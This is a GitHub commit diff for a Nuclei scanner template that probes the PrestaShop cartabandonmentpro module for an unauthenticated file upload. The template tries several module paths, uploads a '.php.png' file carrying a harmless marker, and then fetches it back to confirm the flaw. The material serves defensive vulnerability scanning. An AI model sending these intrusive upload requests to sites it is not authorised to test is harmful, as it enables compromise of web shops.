Merge pull request #11573 from projectdiscovery/added-additional-path

Update prestashop-cartabandonmentpro-file-upload.yaml (Added Additional Path)
projectdiscovery · Feb 3, 2025 · 98794cd · 98794cd
2 parents b7506b4 + 18fda31
commit 98794cd
Showing 1 changed file with 38 additions and 12 deletions.
diff --git a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml
@@ -15,14 +15,17 @@ info:
     product: ap_pagebuilder
     vendor: apollotheme
   tags: intrusive,file-upload,cartabandonmentpro,prestashop
+
+flow: http(1) && http(2)
+
 variables:
   filename: '{{rand_base(7, "abc")}}'
-  title: '{{rand_base(7, "abc")}}'
+  string: '{{rand_base(7, "abc")}}'
 
 http:
   - raw:
       - |
-        POST /modules/cartabandonmentpro/upload.php HTTP/1.1
+        POST /modules/{{paths}}/upload.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=xYzZY
 
@@ -31,24 +34,47 @@ http:
         Content-Type: image/png
 
         <html>
-        <!-- {{title}} -->
+        <!-- {{string}} -->
         </html>
 
         --xYzZY--
 
+    payloads:
+      paths:
+        - 'cartabandonmentpro'
+        - 'cartabandonmentproOld'
+        - 'cartabandonmentpro_Old'
+        - 'cartabandonmentpro2'
+        - 'pscartabandonmentpro'
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "{{filename}}.php.png")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: matched_path
+        part: request
+        internal: true
+        regex:
+          - '\/modules\/([^\/]+)\/'
+
+  - raw:
       - |
-        GET /modules/cartabandonmentpro/uploads/{{filename}}.php.png HTTP/1.1
+        GET {{matched_path}}uploads/{{filename}}.php.png HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'contains(header_2, "image/png")'
-          - 'contains(body_1, "{{filename}}.php.png")'
-          - 'status_code_1 == 200 && status_code_2 == 200'
+          - 'contains(content_type, "image/png")'
+          - 'contains(body, "{{string}}")'
+          - 'status_code == 200'
         condition: and
-<<<<<<< HEAD
-# digest: 4b0a00483046022100da3fefb12797955d5b4ee50101e3aa565ac1b719b66492306459be1d16eb36f8022100be2509c6df7b4855ee9c190a8920a0a73ca487806f778ae4a5fd1d37e0c2a7c8:922c64590222798bb761d5b6d8e72950
-=======
-# digest: 4a0a0047304502206e7fd1274ec8a32ba237fe97e0cec1140d289a60334a308e04e8485002058aaf022100deb3630fa4128c303b0e7cd72d3391a0374c670db5ff498077d4d8779f44e369:922c64590222798bb761d5b6d8e72950
->>>>>>> parent of d3ee7669be (additional-path-added)